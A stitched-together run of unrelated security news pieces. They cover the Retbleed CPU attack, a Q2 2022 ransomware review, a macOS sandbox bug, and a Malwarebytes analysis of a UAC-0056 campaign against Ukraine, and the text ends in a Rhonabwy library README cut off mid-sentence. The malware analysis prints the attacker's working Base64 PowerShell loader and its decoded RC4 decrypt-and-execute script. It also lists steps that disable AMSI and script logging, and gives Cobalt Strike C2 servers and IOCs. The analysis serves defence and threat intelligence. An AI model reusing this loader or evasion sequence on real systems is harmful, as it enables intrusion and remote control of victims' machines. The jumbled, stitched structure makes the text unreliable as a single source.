"Retbleed" bypasses a commonly used mechanism for protecting against a certain kind of side-channel attack.

Researchers at ETH Zurich have found a way to overcome a commonly used defense mechanism against so-called speculative execution attacks targeting modern microprocessors.

In a technical paper published this week, the researchers described how attackers could use their technique — dubbed "Retbleed" — to steal sensitive data from the memory of systems with Intel and AMD microprocessors that are vulnerable to the issue. The researchers built their proof-of concept code for Linux but said some Windows and Apple computers with the affected microprocessors likely have the issue as well.

Their discovery prompted Intel and AMD to issue advisories this week describing mitigations against the new attack method. In an emailed statement, Intel said it had worked with industry partners, the Linux community, and Virtual Machine Manager (VMM) vendors to make mitigations available to customers. "Windows systems are not affected as they already have these mitigations by default," Intel noted.

AMD said the issue the researchers had identified potentially allows arbitrary speculative code execution under certain microarchitecture conditions. "As part of its ongoing work to identify and respond to new potential security vulnerabilities, AMD is recommending software suppliers consider taking additional steps to help guard against Spectre-like attacks," AMD said in an emailed statement. "That guidance is found in a new AMD whitepaper now available."

Both chipmakers said they were not aware of any active exploits in the wild related to the issue that the researchers at ETH Zurich discovered and reported.

**A Dangerous Attack Vector**

Security researchers consider speculative execution attacks as dangerous because they give attackers a way to access and steal sensitive data — including passwords and encryption keys — in a computer's memory. It's an issue that is especially of concern in shared environments such as public cloud services and shared enterprise infrastructure.

Speculative execution is a performance-enhancing mechanism in modern microprocessors where instructions in code are executed in advance of when they are needed, without waiting for previous instructions to be completed. The technique can help speed up microprocessor performance. If the microprocessor guesses wrong and executes an instruction that is not needed, it discards that instruction. But in doing so, it sometimes leaves artifacts from system memory in the processor's buffers or cache.

Threat actors have taken advantage of this fact to devise so-called side channel attacks where they get the microprocessor to speculatively execute code in such a way as to get it to access — and reveal — sensitive information in the system memory. The issue became a major concern in 2018 with the disclosure of the Spectre and Meltdown vulnerabilities in most microprocessors used in everything from servers to PCs, laptops, and mobile devices.

Since then, chipmakers like Intel and AMD have introduced changes and mitigations to make it harder for adversaries to carry out speculative execution side-channel attacks.

One widely used mitigation against speculative execution attacks is called "Retpoline," a Google-developed approach for controlling how a microprocessor performs speculation when handling certain instructions — so-called indirect "jumps" and "calls".

**'Crazy Trick'**

Retpolines work by replacing indirect jumps and calls with the "return" function, says Johannes Wikner, one of the researchers at ETH Zurich who developed the new exploit. "Retpoline replaces indirect jumps with returns using a crazy trick," Wikner says. "It tricks the processor to believe there has been a 'call' made from the location where the indirect jump was intended to lead."

The motivation for replacing indirect jumps and calls with returns was because the return function was considered impractical to exploit, he says.

But that is not the case, Wikner says. Their research showed that it is possible to trigger microarchitectural conditions on Intel and AMD CPUs that force the return function to be speculatively executed just like was possible with indirect jumps and calls. "Retpoline does not \[consider\] the fact the returns can be exploited, into account," he says. "This allows us to bypass the Retpoline defense."

Wikner says it took the researchers some work to exploit the issue on Intel microprocessors and required their finding a sequence of deep function call stacks to trigger it. "We found on AMD that all returns can be exploited regardless of the function call stack," he says. "We built a framework to make it easy also on Intel."

Bogdan Botezatu, director of threat research at Bitdefender, which last year developed a side-channel attack of its own against Intel CPUs, says Retbleed appears to be a side-channel attack as well one that bypasses a mitigation set in place for Spectre. "This is yet another way in which modern CPUs can be exploited to inadvertently leak information that should be considered secret — and for which hardware defenses are burnt into the silicon," he says.

He says two things are worth mentioning when talking about this type of attack. Conceptually, it beats measures built into chips to prevent data from leaking from one realm to the other. "In the hands of a patient and properly positioned attacker, this vulnerability can exfiltrate important information from shared computers or virtualized servers. This is bad," he says.

**Complex to Execute**

At the same time, such attacks require significant knowledge and logistics to successfully result in exfiltration of the data sought by a potential attacker. High-profile targets should be worried about the existence of this vulnerability and should deploy Intel and AMD's recommended mitigations. "Side-channel attacks are effective, but difficult to execute and exfiltrate exactly that piece of information that attackers are after," Botezatu says.

Intel said that two security advisories it published Tuesday address the research. One of them is here and the other here. The company described the issue as impacting some of its Skylake generation processors that do not have a feature called enhanced Indirect Branch Restricted Speculation (eIBRS). "Intel worked with the Linux community and VMM vendors to provide customers with software mitigations to enable Indirect Branch Restricted Speculation (IBRS), and enhanced Indirect Branch Restricted Speculation (eIBRS) where supported."

Windows systems are not affected because they use IBRS by default, the Intel statement noted.

Researchers Devise New Speculative Execution Attacks Against Some Intel, AMD CPUs

2022 is shaping up to be another banner year for ransomware, which continued to dominate the threat landscape in Q2. 
The post Ransomware rolled through business defenses in Q2 2022 appeared first on Malwarebytes Labs.

Ransomware has given security professionals a headache for the better part of a decade. Fast forward to 2022, and the headache has become a migraine—not just for IT teams but business owners, employees, and customers as well. Over the last three months, ransomware gangs have increased the pressure by multiplying in number and unleashing targeted attacks on vulnerable industries, with disruptions to business operations, million-dollar ransom demands, data exfiltration, and extortion.

The supply chain, already stretched to a breaking point, suffered additional misfortunes across multiple industries, from agriculture and manufacturing to technology and utilities. Governments, nonprofits, and schools—some forced to close their doors—didn’t escape unscathed. And the carnage was not confined to US borders, though it was by far the most affected country. Germany, the UK, and Italy also registered high ransomware tallies.

To understand how we got here, let’s first take a closer look at recent statistics on the top ransomware variants, countries and industries attacked. Next, we’ll evaluate noteworthy attacks month-by-month before discussing whether it’s worth paying the ransom in today’s climate. In addition, we’ll examine current trends to deduce what businesses might expect from ransomware authors in the months to come. Finally, we’ll review mitigation tactics that businesses of all sizes can adopt to keep ransomware at bay.

****Top ransomware variants****

LockBit was the most widely-distributed ransomware in March, April, and May 2022, and its total of 263 spring attacks was more than double the number of Conti, the variant in second place. However, the Conti gang suffered severe setbacks in the wake of its public declaration of support for Russia and subsequent data leaks of its source code, and the group quietly dismantled operations while keeping up appearances. Three groups alleged to be linked to Conti’s disbandment—Black Basta, ALPHV, and Hive—eventually overtook Conti in ransomware distribution by the end of May.

Here’s how the top variants ranked by total number of spring incidents:

1.  LockBit: 263
2.  Conti: 127
3.  Black Cat/ALPHV: 68
4.  Hive: 40
5.  Black Basta: 33\*

\*Black Basta launched in April, so its tally is one month less than the others.

****Top countries****

The United States was by far the most attacked country this spring, with 290 reported ransomware events. Its cyberattack count far surpassed the next two highest countries (Germany and the UK) combined, with the former reporting 48 ransomware incidents and the latter 41.

Here are the top five countries impacted by ransomware this spring:

1.  United States: 290
2.  Germany: 48
3.  UK: 41
4.  Italy: 38
5.  Canada: 31

****Top industries****

Perhaps it might be easier to create a list of industries that weren’t impacted by ransomware in Q2. Services—a catch-all term encompassing service-providing sectors such as transportation, travel, finance, health, education, information, government, and a myriad of other industries—was targeted the most by cybercriminals. However, in a clear bid for the supply chain jugular, threat actors also zeroed in on manufacturing, technology, utilities (including oil), and agriculture.

In fact, the FBI warned the food and agriculture sector (specifically farmers’ co-ops) this April about potential ransomware attacks during critical planting and harvesting seasons that could result in operational disruptions to the supply chain, which could then lead to food shortages. The previous month, HP Hood Dairy suffered a ransomware attack, which was likely behind its Lactaid brand going missing from shelves in early April.

Here’s how the top five industries ranked by number of ransomware attacks this spring:

1.  Services: 171
2.  Manufacturing: 76
3.  Technology: 65
4.  Utilities: 61
5.  Retail: 50

****Noteworthy March attacks****

March was a chaotic month featuring headline-grabbing attacks on tech giants Microsoft and Samsung, as well as automotive titan Toyota, which was forced to halt production across its Japanese plants after a key supplier was compromised. Lapsus$, the criminal enterprise behind Samsung’s infiltration, leaked 190 GB of data and source code reportedly from the Galaxy smart phone, as well as confidential information from Qualcomm.

The most active ransomware variant was LockBit, which registered 97 attacks in March alone, including a hit on tire company Bridgestone Americas that caused the organization to disconnect many of its Latin and North American manufacturing and retreading facilities from the corporate network.

Hive ransomware, a RaaS launched in June 2021, was also busy in March. The group attacked Romania’s petroleum provider, demanding a multi-million dollar ransom and forcing the company to shut down its websites and Fill&Go services at gas stations. Hive also compromised a California healthcare nonprofit later in the month.

****Noteworthy April attacks****

April stood out as the month when three new dangerous RaaS variants, thought to be Conti-affiliated were introduced: Onyx, Mindware, and Black Basta. Conti still had some bite left, however, with 43 reported attacks that month. Among them were industrial giant Parker Hannifin and American automotive tools manufacturer Snap-on, as well as Panasonic’s Canadian operations, from which Conti claimed to have stolen 2.8 GB of data.

Newcomer Black Basta, who carried out 11 attacks in April, made headlines when it compromised German wind turbine company Deutsche Windtechnik and the American Dental Association, which was forced to take affected systems offline. The organization suffered disruptions to online services, telephones, email, and webchat, as well as personal data leaked on its members.

Onyx ransomware, meanwhile, launched with only six attacks in April, but they were deadly. The malware doesn’t just lock up systems and data—it destroys any file larger than 2 MB. Mindware also made a splashy April debut with double extortion threats and 13 attacks, including a Minnesota-based mental health provider from which it pilfered sensitive patient information.

The award for most data stolen in April goes to the Stormous criminal gang, who bragged about an assault resulting in 161 GBs exfiltrated from Coca-Cola without the company knowing. Reports say the Russian-linked threat actors later put it up for sale for 16 million Bitcoin or $640,000.

To add insult to injury, REvil (aka Sodonokibi) appeared to return in April with new payloads and a fresh leak blog featuring a mixture of recent and old victims. The threat actors have been linked to numerous high-profile ransomware incidents, including arguably the biggest ransomware attack of all time—a supply-chain hit on Kaseya in July 2021 believed to have affected over 1,000 businesses.

****Noteworthy May attacks****

In May, government and education were some of the hardest hit verticals, while attacks on Indian airline SpiceJet and farming equipment maker AGCO made the most headlines globally. Black Basta was reportedly behind the AGCO infiltration, which disrupted production of harvesters, tractors, and other business operations. The Austrian state of Carinthia also made the news when the BlackCat gang disrupted their systems and demanded a ransom of $5 million.

Despite strong evidence of a slow-down in activity—just 12 reported incidents in May—Conti made a showy display with a massive, sustained attack against Costa Rica that resulted in its new president declaring a state of emergency on May 8. On the same day, an inflammatory message appeared on the group’s leak site alongside 672 GB of stolen data. In response, the US Department of State offered a $10 million reward for information leading to individuals holding key leadership positions within Conti.

In other May government attacks, the town of Quincy, Massachusetts, had its information service systems compromised. They paid $500,000 for a decryption key and an additional $150,000 for security consultants to assist with the investigation. A ransomware attack in New Jersey’s Somerset County disrupted services and forced employees to shut down computers and create temporary Gmail accounts to ensure the public could still email key departments. The attack marked the 22nd US state or local government to be hit by ransomware in 2022, according to analysts at Recorded Future.

In education, several colleges and K–12 districts were crippled by ransomware. Kellogg Community College in Michigan was forced to cancel classes and close campuses due to a ransomware attack. On May 13, Lincoln College in Illinois permanently closed its doors after 157 years due to the combined effects of the pandemic and a major ransomware incident—a first in ransomware history.

Not to be outdone, LockBit set a steady pace in May with 73 attacks. Thought to have strong ties with Russia, the cybercriminals compromised the Bulgarian Refugee Agency and threatened to release sensitive files. Nearly 230,000 Ukrainian refugees have entered Bulgaria since the start of the war. LockBit was also behind May strikes against electronics manufacturer Foxcomm, the Rio de Janeiro finance department, and one of the largest library services in Germany.

****New ransomware trends****

In recent months, cybercriminals have upped the ransomware ante with further developments in functionality, sophistication, and distribution techniques. As a combined result of the increase in big game hunting (BGH) and remote/hybrid work, threat actors have been encountering ever more complex security infrastructures and a wider variety of devices and platforms.

To penetrate and encrypt as many systems as possible, some threat groups have started writing ransomware code using cross-platform programming languages like Python, Rust, or Golang. This allows the malware to run on different combinations of operating systems and architectures. Both BlackCat and Conti affiliates have been observed distributing versions of their variants for Linux as well as Windows. Developing in a cross-platform language also makes analyzing the malware more difficult for security researchers.

In attack methods, ransomware authors—while still favoring good old-fashioned social engineering—have started backing away from phishing emails and leaning toward exploiting server, software, and operating system vulnerabilities instead. In fact, unpatched vulnerabilities are now the primary vector for ransomware attacks, according to a report by IT software company Ivanti.

Last year, Ivanti identified 65 new vulnerabilities known to have been exploited in ransomware attacks—a number representing nearly one quarter of all vulnerabilities used to drop the threat in the history of its existence. There were 39 percent more vulnerabilities used for ransomware attacks in 2021 than in the previous year, and 2022 is shaping up to be even more tumultuous. From January to May 2022, 22 new vulnerabilities associated with ransomware were found, and all but one are considered critical or high-risk.

What do these trends mean for the year ahead? Cross-platform ransomware has the potential to infect even more systems, some (like Linux) that lack robust anti-ransomware protections. Coding ransomware in this way could eventually take down all endpoints, including IoT and personal devices, in a single blow, rendering recovery operations incredibly difficult—if not outright impossible. Automatic data backups to offsite and/or segmented servers will be key in keeping businesses operational in case of breach.

Meanwhile, ransomware operators are moving to swiftly weaponize vulnerabilities. The average time to exploit is now within eight days of the vulnerability being published by a vendor. That means organizations will need to prioritize patching vulnerabilities associated with ransomware, as well as according to criticality and against their own risk appetites.

****To pay or not to pay****

As ransomware attacks have evolved in sophistication and impact, so too have their ransom demands. Ransoms were 36 percent higher in 2021 than in 2020 at an average of $6.1 million. Yet by spring of 2022, many ransomware authors had whittled away at any sense of trust businesses might have had that by paying the ransom, they’ll receive what’s promised.

In 2020, gangs such as Conti, REvil, and Maze published stolen data even if the ransom was paid. Others took the ransom and never returned the files. By 2021, only 8 percent of those who paid the ransom actually got their files back. At that point, 83 percent of successful attacks featured double or triple extortion schemes. According to a Proofpoint study, 60 percent of participants who opted to negotiate with their attackers ended up having to pay ransom more than once.

By spring 2022, ransomware gangs showed no sense of responsibility toward their victims. RaaS operations, which now dominate the ransomware landscape, tend to be short-lived (therefore reputation isn’t important), and renegade affiliates often fail to follow their operator’s directions. When ransom demands bust the budget, data is not returned or is leaked regardless, and paying up puts a target on your back, it’s probably best to pocket the millions and get to work on mitigations.

****Ransomware mitigations****

To stave off potential future attacks—especially in an era of political and economical instability—the following actions are recommended:

*   Implement regular backups of all data to be stored as air-gapped, password-protected copies offline. Make sure these copies are not accessible for modification or deletion from any system where the original data lives.
*   Administer network segmentation so that all machines on your network are not accessible from every other machine.
*   Install updates/patches to operating systems, software and firmware as soon as they are released.
*   Install and regularly update endpoint security software on all devices—including those used in work-from-home capacities—and enable real-time detection.
*   Audit user accounts with administrative privileges and configure access controls with the least privilege in mind. Implement multifactor authentication (MFA) for additional credential security.
*   Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor for any unusual activity.

For ransomware reviews by the Malwarebytes Threat Intel team, check out the following:

*   March ransomware review
*   April ransomware review
*   May ransomware review
*   June ransomware review

Be ready and resilient in advance of ransomware attacks. Learn more.

_Malwarebytes’ CEO Marcin Kleczynski started the Byte into Security newsletter to provide readers with candid takeaways—and practical solutions—for the most pressing security topics of the day._ _Subscribe to get the CEO perspective sent straight to your inbox_!

Ransomware rolled through business defenses in Q2 2022

Microsoft reveals now-fixed flaw in Apple's App Sandbox controls could allow attackers to escalate device privileges and deploy malware.

Microsoft has revealed a now-fixed flaw in Apple's macOS that allowed specific kinds of code to bypass the operating system's App Sandbox restrictions on third-party applications, potentially allowing attackers to escalate device privileges and install additional malicious payloads.

Microsoft shares credit for the find (CVE-2022-26706) with researcher Arsenii Kostromin, the company said in its announcement, adding that Apple patched the vulnerability in its May 16 security update.

The team at Microsoft discovered the bug while researching malicious macros in Microsoft Office for macOS, they explained in a recent blog post.

"Our research shows that even the built-in, baseline security features in macOS could still be bypassed, potentially compromising system and user data," the team wrote. "Therefore, collaboration between vulnerability researchers, software vendors, and the larger security community remains crucial to helping secure the overall user experience. This includes responsibly disclosing vulnerabilities to vendors."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

MacOS Bug Could Let Malicious Code Break Out of Application Sandbox

While the war in Ukraine still rages, various threat actors continue to launch cyber attacks against its government entities. In this blog we review the latest campaign from the UAC-0056 threat group.
The post Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign appeared first on Malwarebytes Labs.

_This blog was authored by Roberto Santos and Hossein Jazi_

The Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with high confidence to UAC-0056 (AKA UNC2589, TA471). This threat group has repeatedly targeted the government entities in Ukraine via phishing campaigns following the same common tactics, techniques and procedures (TTPs).

Lures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have been closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.

In this blog, we will connect the dots between different decoy samples that we and others such as Ukraine CERT have observed. We will also share indicators for a previously undocumented campaign performed by the same threat actor at the end of June.

**Different themes, same techniques**

Since the publication of our blog post _There’s a Go Elephant in the room_, we have tracked several new samples as can be seen in the timeline below:

Figure 1: Relations between different UAC-0056 attributed samples

Let’s dig further into those relationships. UA-CERT has attributed the document named “_Information on the availability of **vacancies** and their staffing.xls_” to UAC-0056. This file looked familiar to us and for good reason because the macro is nearly identical to the document we analyzed in our initial blog:

Figure 2: Detail of Vacancies and GoElephant dropper macros

In the most recent attack reported by UA-CERT (_**Humanitarian catastrophe** of Ukraine since February 24, 2022.xls_) we see an almost identical macro to the one used in another decoy document called _Help Ukraine.xls_:

Figure 3: Detail of Help Ukraine and Humanitarian catastrophe macros

The **Help Ukraine** lure, to our knowledge, has never been publicly documented before:

Figure 4: Help Ukraine lure used in late July

We were able to identify 7 different samples with that theme, including one (258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous attack:

Figure 5: Similarities between different versions

Also, in the past we have found comments regarding to a domain named ExcelVBA\[.\]ru. This document was contacting a suspiciously similar domain named excel-vba\[.\]ru.

Figure 6: Similarities between different versions (2)

Among victims, we find gov.ua emails being targeted. One of the texts used as email body in the last campaign was written in Ukrainian and translates to:

> _On February 24, 2022, the army of the terrorist state – the Russian Federation, intervened on the territory of Ukraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the Office of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens of Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of destroyed homes, on the number of destroyed businesses as a result of an act of aggression . This report shows all the data broken down by regions of Ukraine. Familiarize yourself and familiarize your colleagues with the real state of affairs. Glory to Ukraine_!
> 
> Translation of original email sent to victims

We will focus our analysis on these 3 newer templates. Exact names and paths are from 024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1 (_Information on the availability of vacancies and their staffing.xls_). The analysis is still valid for the others, while minor changes exist between samples.

**write.bin**

The document will download an executable file named _write.bin_. Other attacks following the same scheme used different names for this file, including _Office.exe_, _baseupd.exe_ and _DataSource.exe_. The file is slightly obfuscated, and performs the following actions:

**Establishing persistence**

After some antidebug tricks, the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Check License is used to establish persistence. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update Checker, is checked first because that was the key used by previous versions of the malware.

Figure 7: Run key for persistence

**Dropping next stage**

Next step is dropping a file in _C:\\ProgramData\\TRYxaEbX_.  This file will be used later.

Figure 8: Powershell commandline shown in IDA Pro

The payload will execute the following powershell Base64 encoded command:

JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIAWAAiACkAOwAKACQAQgAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAQwBtAEEASgBuAGcAdgBkAEQAbQBpAFQAagBMAHgATgAiACkAOwAKACQAQQA9AHsAJABXACwAJABZAD0AJABBAHIAZwBzADsAJABYAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAFoAPQAoACQAWgArACQAWABbACQAXwBdACsAJABZAFsAJABfACUAJABZAC4ATABlAG4AZwB0AGgAXQApACUAMgA1ADYAOwAkAFgAWwAkAF8AXQAsACQAWABbACQAWgBdAD0AJABYAFsAJABaAF0ALAAkAFgAWwAkAF8AXQB9ADsAJABXAHwAJQB7ACQAVQA9ACgAJABVACsAMQApACUAMgA1ADYAOwAkAFYAPQAoACQAVgArACQAWABbACQAVQBdACkAJQAyADUANgA7ACQAWABbACQAVQBdACwAJABYAFsAJABWAF0APQAkAFgAWwAkAFYAXQAsACQAWABbACQAVQBdADsAJABfAC0AYgB4AG8AcgAkAFgAWwAoACQAWABbACQAVQBdACsAJABYAFsAJABWAF0AKQAlADIANQA2AF0AfQB9ADsACgAkAEMAIAA9ACAAKAAmACAAJABBACAAJABBADEAIAAkAEIAMQApADsACgAkAEUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEMALAAwACwAJABDAC4ATABlAG4AZwB0AGgAKQA7AAoAJABFACAAPQAgACQARQAgAC0AUwBwAGwAaQB0ACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQA7AAoAZgBvAHIAZQBhAGMAaAAoACQARQBFACAAaQBuACAAJABFACkAewBpAGUAeAAgACQAKAAkAEUARQArACIAOwAiACkAOwB9ADsA

Figure 9: Write executable creating the previous detailed powershell command

The chunk before is Base64 encoded; which decodes to:

$A1 = [System.IO.File]::ReadAllBytes("C:\ProgramData\TRYxaEbX");

$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};

$C = (& $A $A1 $B1);

$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);

$E = $E -Split [Environment]::NewLine;

foreach($EE in $E){iex $($EE+";");};

In short the file dropped in _C:\ProgramData\TRYxaEbX_ will be decrypted using CmAJngvdDmiTjLxN as key using the RC4 algorithm. This next PowerShell script will look like:

Figure 10: Decoded PowerShell stage

Here we can see some of the actions that will be taken:

*   Disable script logging
*   Disable Module Logging
*   Disable Transcription
*   Disable AMSI protection

After this step, another Base64 payload is decoded and executed:

Figure 11: Final PowerShell script

**Cobalt Strike payload deployed**

As it can be seen, the main functionality provided by this second PowerShell file is to inject shellcode. This shellcode can be 32 or 64 bit, and is a Cobalt Strike beacon with the following configuration:

**BeaconType**                    – HTTPS

**Port**                              – 443

**SleepTime**                       – 30000

**PublicKey\_MD5**              – defb5d95ce99e1ebbf421a1a38d9cb64

**C2Server**                         – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/

**UserAgent**                       – Mozilla/5.0\_Frsg\_stredf\_o21\_rutyyyrui\_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko\_10984gap

**HttpPostUri**                    – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/

**Watermark**                      – 1580103824

By having a Cobalt Strike instance running on the victim’s machine, it is now fully compromised.

**Attacker probes the sandbox**

At the time of writing, malicious C&C servers seem to be down. However, on July 5 we saw active servers and successful connections to our test environment. The attackers actively sent reconnaissance commands to the machine, listing the content of several folders.

We were able to decode the network communications using Didier Steven’s excellent collection of Cobalt Strike tools.

Figure 12: Cobalt Strike communication decoded

We consider these actions preliminary moves to check whether the machine is a viable target or not before following up with other actions.

**Attribution to UAC-0056**

Based on recent attacks reported by CERT UA, as well as the similarities indicated at the beginning of the blog, we can attribute this attack with high confidence to UAC-0056.

Signatures contained in the Cobalt Strike beacons (watermark 1580103824 and public key defb5d95ce99e1ebbf421a1a38d9cb64), may be used to connect the attack to other groups. For instance, the public key should be unique among deployments, according to the CobaltStrike documentation.

However, it is important to note that in that case we cannot simply rely on a public key to attribute the sample we analyzed in this report. In fact, these signatures have been attributed to many different groups. Our assessment is that the group used a leaked version of Cobalt Strike and used the same private key as others, making attribution harder.

Malwarebytes users were protected against this campaign thanks to our Anti-Exploit layer.

**IOCs**

**Malicious Excel documents (Help Ukraine template)**

fe3bc87b433e51e0713d80e379a61916ceb6007648b0fde1c44491ba44dc1cb3  
c9675483ab362bc656a9f682928b6a0c3ff60a274ade3ceabac332069480605a  
1b95186ecc081911c3a80f278e4ed34ee9ef3a46f5cf1ae8573ac3a4c69df532  
258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0  
e663bb4d9506e7c09bcf7b764d31b61d8f7dbae0b64dd4ef4e9d282e1909d386  
ecd2bb648a9ad28069c1ec4c0da546507797fdf0243e9e5eece581bf702675ff  
eac9a4d9b63a0ca68194eae433d6b2e9a4531b60b82faf218b8dd4b69cec09df

**Malicious Excel documents (Humanitarian template)**

024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1  
14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea  
474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d

**Payloads**

0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470  
aadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a  
fb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346  
501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff

**Cobalt Strike beacon and payloads**

136.144.41\[.\]177  
syriahr\[.\]eu/s/Xnk75JwUcIebkrmENtufIiiKEmoqBN/field-keywords/  
syriahr\[.\]eu/nzXlLVas-VALvDh9lopkC/avp/amznussraps/  
skreatortemp\[.\]site  
imolaoggi\[.\]eu

Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign

Rhonabwy before v1.1.5 was discovered to contain a buffer overflow via the component r_jwe_aesgcm_key_unwrap. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted JWE token.

**Rhonabwy - Javascript Object Signing and Encryption (JOSE) library - JWK, JWKS, JWS, JWE and JWT**

 

*   Create, modify, parse, import or export JSON Web Keys (JWK) and JSON Web Keys Set (JWKS)
*   Create, modify, parse, validate or serialize JSON Web Signatures (JWS)
*   Create, modify, parse, validate or serialize JSON Web Encryption (JWE)
*   Create, modify, parse, validate or serialize JSON Web Token (JWT)

JWT Relies on JWS and JWE functions, so it supports the same functionalities as the other 2. JWT functionalities also support nesting serialization (JWE nested in a JWS or the opposite).

*   Supported Cryptographic Algorithms (alg) for Digital Signatures and MACs:

"alg" Param Value

Digital Signature or MAC Algorithm

Supported

HS256

HMAC using SHA-256

**YES**

HS384

HMAC using SHA-384

**YES**

HS512

HMAC using SHA-512

**YES**

RS256

RSASSA-PKCS1-v1\_5 using SHA-256

**YES**

RS384

RSASSA-PKCS1-v1\_5 using SHA-384

**YES**

RS512

RSASSA-PKCS1-v1\_5 using SHA-512

**YES**

ES256

ECDSA using P-256 and SHA-256

**YES**(1)

ES384

ECDSA using P-384 and SHA-384

**YES**(1)

ES512

ECDSA using P-521 and SHA-512

**YES**(1)

PS256

RSASSA-PSS using SHA-256 and MGF1 with SHA-256

**YES**(1)

PS384

RSASSA-PSS using SHA-384 and MGF1 with SHA-384

**YES**(1)

PS512

RSASSA-PSS using SHA-512 and MGF1 with SHA-512

**YES**(1)

none

No digital signature or MAC performed

**YES**

EdDSA

Digital Signature with Ed25519 Elliptic Curve

**YES**(1)

ES256K

Digital Signature with secp256k1 Curve Key

_NO_

(1) GnuTLS 3.6 minimum is required for ECDSA, Ed25519 (EdDSA) and RSA-PSS signatures.

*   Supported Encryption Algorithm (enc) for JWE payload encryption:

"enc" Param Value

Content Encryption Algorithm

Supported

A128CBC-HS256

AES\_128\_CBC\_HMAC\_SHA\_256 authenticated encryption algorithm, as defined in Section 5.2.3

**YES**

A192CBC-HS384

AES\_192\_CBC\_HMAC\_SHA\_384 authenticated encryption algorithm, as defined in Section 5.2.4

**YES**

A256CBC-HS512

AES\_256\_CBC\_HMAC\_SHA\_512 authenticated encryption algorithm, as defined in Section 5.2.5

**YES**

A128GCM

AES GCM using 128-bit key

**YES**

A192GCM

AES GCM using 192-bit key

**YES** (2)

A256GCM

AES GCM using 256-bit key

**YES**

(2) GnuTLS 3.6.14 minimum is required for A192GCM enc.

*   Supported Cryptographic Algorithms (alg) for Key Management:

"alg" Param Value

Key Management Algorithm

Supported

RSA1\_5

RSAES-PKCS1-v1\_5

**YES**

RSA-OAEP

RSAES OAEP using default parameters

**YES**(3)

RSA-OAEP-256

RSAES OAEP using SHA-256 and MGF1 with SHA-256

**YES**

A128KW

AES Key Wrap with default initial value using 128-bit key

**YES**(3)

A192KW

AES Key Wrap with default initial value using 192-bit key

**YES**(3)

A256KW

AES Key Wrap with default initial value using 256-bit key

**YES**(3)

dir

Direct use of a shared symmetric key as the CEK

**YES**

ECDH-ES

Elliptic Curve Diffie-Hellman Ephemeral Static key agreement using Concat KDF

**YES**(4)

ECDH-ES+A128KW

ECDH-ES using Concat KDF and CEK wrapped with "A128KW"

**YES**(4)

ECDH-ES+A192KW

ECDH-ES using Concat KDF and CEK wrapped with "A192KW"

**YES**(4)

ECDH-ES+A256KW

ECDH-ES using Concat KDF and CEK wrapped with "A256KW"

**YES**(4)

A128GCMKW

Key wrapping with AES GCM using 128-bit key

**YES**

A192GCMKW

Key wrapping with AES GCM using 192-bit key

**YES**(5)

A256GCMKW

Key wrapping with AES GCM using 256-bit key

**YES**

PBES2-HS256+A128KW

PBES2 with HMAC SHA-256 and "A128KW" wrapping

**YES**(5)

PBES2-HS384+A192KW

PBES2 with HMAC SHA-384 and "A192KW" wrapping

**YES**(5)

PBES2-HS512+A256KW

PBES2 with HMAC SHA-512 and "A256KW" wrapping

**YES**(5)

(3) Nettle 3.4 minimum is required for RSA-OAEP and AES key Wrap

(4) Nettle 3.6 minimum is required for ECDH-ES

(5) GnuTLS 3.6.14 minimum is required for A192GCMKW, PBES2-HS256+A128KW, PBES2-HS384+A192KW and PBES2-HS512+A256KW key wrapping algorithms.

**rnbyc, Rhonabwy command-line tool**

This command-line program can be used to:

